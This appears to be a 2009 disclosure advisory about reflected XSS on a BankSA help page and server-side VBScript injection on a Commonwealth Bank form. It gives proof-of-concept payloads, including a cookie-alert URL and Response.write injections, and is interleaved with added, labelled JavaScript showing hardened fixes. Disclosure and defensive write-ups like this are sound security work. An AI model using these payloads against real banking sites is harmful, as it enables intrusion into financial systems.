Security Advisory: Banks in Australia



==============================================
Security Advisory: Banks in Australia

militan (Chia-Jun Lin)
militan.c7@gmail.com
adl.csie.ncu.edu.tw/~militan
militan-c7.blogspot.com
Advanced Defense Lab(ADL), NCU CSIE TAIWAN
7th May, 2009
==============================================


I. VULNERABILITY
-------------------------
XSS
Command Injection

Banks below are vulnerable:
BankSA. www.banksa.com.au
Commonwealth Bank. www.commbank.com.au
etc...

II. DESCRIPTION
-------------------------
Some bank websites contain vulnerable pages that attackers may misuse.
Through the command injection, an attacker can execute arbitrary VBScript commands on the server hosts.

Generally, the websites of banks in AU do implement security mechanisms;
however, their complex architectures are not actually necessary.
Because of these large architectures, some pages do not perform input validation properly.


III. DETAIL & POC
------------------------
1. BankSA: XSS (JavaScript injection)
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
BBO stands for "Business Banking Online"; the vulnerable parameter is "origin".

If origin=CBS, the page immediately redirects to the link below.
www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS

However, if origin=CBS" (with a trailing double quote) is supplied, the value is reflected unescaped into the script below and the page no longer redirects correctly.
****javascript code generated in the intermediate page
function focusWin()
{
  window.focus();
  //var theUrl = window.location.pathname;
  //var pos = theUrl.indexOf("help.asp");
  //theUrl = theUrl.substr(0,pos);
  // the "origin" parameter is reflected here without escaping: origin=CBS" produces CBS"" and breaks the string literal
  window.location.href = "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"";
  //document.write("http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"");
}
window.onload = focusWin;
****

Exploit:
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);//
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}%0a%0a
POC:
http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg
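The root cause above is a request parameter concatenated straight into a JavaScript string literal. The following is an added example, not code from the advisory or from BankSA, showing that template beside a hardened version that allow-lists the "origin" value, URL-encodes it, and emits the URL as an encoded JS string literal. The names buildRedirectScriptUnsafe, buildRedirectScriptSafe, jsStringLiteral, redirectTargetOf and the allow-list ALLOWED_ORIGINS are assumptions for this example; the advisory only shows CBS as a valid origin value.

```javascript
// Added example (not the advisory's or BankSA's code): embedding a request
// parameter into generated JavaScript without letting it break the literal.

const BASE_URL =
  "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet";

// Assumed allow-list: the advisory shows only origin=CBS as a legitimate value.
const ALLOWED_ORIGINS = new Set(["CBS"]);

// Mirrors the pattern in the advisory's generated page: the raw parameter is
// concatenated into a double-quoted JS string, so a quote in the value ends
// the literal early.
function buildRedirectScriptUnsafe(origin) {
  return (
    "function focusWin() {\n" +
    "  window.focus();\n" +
    '  window.location.href = "' + BASE_URL + "&origin=" + origin + '";\n' +
    "}\n" +
    "window.onload = focusWin;\n"
  );
}

// Encodes a value as a JavaScript string literal that is also safe inside an
// HTML <script> element: JSON.stringify handles quotes, backslashes and control
// characters; the extra replacements keep "</script>" and HTML metacharacters
// from being seen by the HTML parser, which runs before the JS parser.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened version: reject values outside the allow-list, URL-encode the value
// when building the query string, and emit the URL as an encoded literal.
function buildRedirectScriptSafe(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) {
    return null; // the caller should answer 400 instead of serving a redirect page
  }
  const url = BASE_URL + "&origin=" + encodeURIComponent(origin);
  return (
    "function focusWin() {\n" +
    "  window.focus();\n" +
    "  window.location.href = " + jsStringLiteral(url) + ";\n" +
    "}\n" +
    "window.onload = focusWin;\n"
  );
}

// Test helper: runs a generated script against a stub window object and
// returns where it would navigate. A broken template throws a SyntaxError
// here, which is exactly the symptom the advisory describes.
function redirectTargetOf(script) {
  const stubWindow = { focus() {}, location: { href: "" }, onload: null };
  new Function("window", script + "\nwindow.onload();")(stubWindow);
  return stubWindow.location.href;
}
```

For the legitimate value both builders produce a script that navigates to the same URL; for the value containing a trailing quote the unsafe builder yields a script that does not even parse, while the safe builder refuses the value before any script is generated.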


2. Commonwealth Bank: ASP command injection (server-side VBScript injection)
Commonwealth Bank provides many tools for financial calculations and for evaluating a financial plan.
The page below collects personal information and makes an appointment, and almost all of its parameters are processed by VBScript on the server.
www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp

Moreover, the page returns the server error message when the parameters are mangled.
Thus attackers can craft the exploit easily,
and arbitrary VBScript commands can then be executed on the server.

Exploit:
POST parameter: Whattodo (default: FillForm)
FillForm & Response.write("ccccc")'
FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '
POC:
http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg

http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg
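The advisory does not show the server-side code, but the payload shape (VBScript's concatenation operator & followed by a comment character ') indicates that the Whattodo value was concatenated into VBScript that the server then executed, and that raw error text was returned to the client. The following is an added example, not code from the advisory or from Commonwealth Bank, of the dispatch pattern that removes both problems: the parameter value is only ever used as a key into a fixed map of handlers, and clients receive generic error responses while details go to a server-side log. The names ACTIONS, handleRequest, renderForm, escapeHtml and serverLog, and the in-memory log, are assumptions constructed for this example.

```javascript
// Added example (not the advisory's or the bank's code): handling a form
// action parameter such as "Whattodo" by table lookup instead of code execution.

// Constructed in-memory log standing in for the server's application log.
const serverLog = [];

// Minimal HTML escaping for values echoed back into the form.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

function renderForm(post) {
  // Constructed stand-in for the appointment form; only escaped values are echoed.
  return '<form method="post"><input name="name" value="' +
    escapeHtml(post.name || "") + '"></form>';
}

// Every permitted action is a function in this Map. The Map is the only place
// the parameter value is interpreted, so the client can choose an action but
// can never supply code. A Map (not a plain object) avoids prototype keys such
// as "constructor" being treated as valid actions.
const ACTIONS = new Map([
  ["FillForm", (post) => ({ status: 200, body: renderForm(post) })],
  ["Submit", (post) => {
    if (!post.name) throw new Error("name is required"); // internal detail, never shown to client
    return { status: 200, body: "Appointment request received." };
  }],
]);

function handleRequest(post) {
  // Default matches the advisory: Whattodo defaults to FillForm.
  const requested = post.Whattodo === undefined ? "FillForm" : String(post.Whattodo);
  const action = ACTIONS.get(requested);
  if (!action) {
    // Unknown value: refuse it, and record the raw value for defenders to review.
    serverLog.push("rejected Whattodo=" + JSON.stringify(requested));
    return { status: 400, body: "Invalid request." };
  }
  try {
    return action(post);
  } catch (err) {
    // Log the detail server-side; the client sees only a generic message.
    serverLog.push("error in " + requested + ": " + err.message);
    return { status: 500, body: "An error occurred. Please try again later." };
  }
}
```

Because unexpected Whattodo values are rejected and logged rather than executed, a monitoring rule on the "rejected Whattodo=" log entries also gives defenders an early signal that someone is probing the parameter.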



IV. SOLUTION & CONCLUSION
-------------------------
Most banks in AU should reduce the enormous architecture of their websites:
either do not provide additional functions, or make sure that those functions are secure.

The vulnerabilities have been fixed already.



regards
--
militan
Advanced Defense Lab, NCU Taiwan
